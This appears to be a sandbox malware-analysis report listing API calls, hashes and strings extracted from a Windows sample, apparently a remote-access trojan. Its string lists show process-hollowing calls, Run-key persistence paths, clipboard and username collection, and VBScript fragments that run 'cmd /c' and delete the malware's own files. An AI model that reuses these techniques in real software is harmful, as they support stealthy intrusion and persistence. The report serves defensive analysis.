                                                                                                                                                                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                                                                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                                                                                                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                                                                                        • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                                                                                                                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2829624132-0
                                                                                                                                                                                      • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                                                                                                                                                      • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                                                                                                                                                                      • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                                                                                                                                                      • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                                                                                                                                                                                      • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                                                                                                                                                                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1815803762-0
                                                                                                                                                                                      • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                                                                      • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                                                                      • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 0040B711
                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040B725
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2058664381-0
                                                                                                                                                                                      • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                                                                                                                                                                      • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                                                                                                                                                      • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                                                                                                                                                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                                                                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                                                                                                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                      • String ID: lJD
                                                                                                                                                                                      • API String ID: 1084509184-3316369744
                                                                                                                                                                                      • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                                                                                                                                                      • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                                                                                                                                                                      • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                      • String ID: GetLocaleInfoEx
                                                                                                                                                                                      • API String ID: 2299586839-2904428671
                                                                                                                                                                                      • Opcode ID: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                                                                                                                                                                                      • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                                                                                                                                                                                      • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                                                                                                                                                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                                                                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                                                                                                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                                                                                        • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                                                                                                                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1663032902-0
                                                                                                                                                                                      • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                                                                                                                                                      • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                                                                                                                                                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                                                                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                                                                                                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2692324296-0
                                                                                                                                                                                      • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                                                                      • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2645101109-0
                                                                                                                                                                                      • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                                                                                                                                                                      • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                                                                      • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                                                                                                                                                      • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                      • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                                                                                                                                                      • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                                                                                                                                                      • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                                                                                                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                                                                                                                                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                                                                                                                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                                                                                                                                                      • ResumeThread.KERNEL32(?), ref: 00418435
                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                                                                                                                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041847A
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                                                                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Wu$ntdll
                                                                                                                                                                                      • API String ID: 4188446516-529412701
                                                                                                                                                                                      • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                                                                                                                                                                      • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                                                                                                                                                      • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                                                                                                                                                                      • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                                                                                                                                                                        • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                                                                                                                                                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                                                                                                                                                                        • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                                                                                                                                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                                                                                                                                                                        • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040D7D0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                      • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                                                                      • API String ID: 1861856835-332907002
                                                                                                                                                                                      • Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                                                                                                                                                                      • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                                                                                                                                                                        • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                                                                                                                                                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                                                                                                                                                                        • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                                                                                                                                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                                                                                                                                                                        • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040D419
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                      • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                                                                      • API String ID: 3797177996-2557013105
                                                                                                                                                                                      • Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                                                                                                                                                                      • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                                                                                                                                                      • Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                                                                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                                                                                                                                                                        • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 00412682
                                                                                                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                                                                                      • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                                                                                                                      • API String ID: 2649220323-436679193
                                                                                                                                                                                      • Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                                                                                                                                                                      • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                                                                                                                                                      • Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                                                                                                                                                      Uniqueness

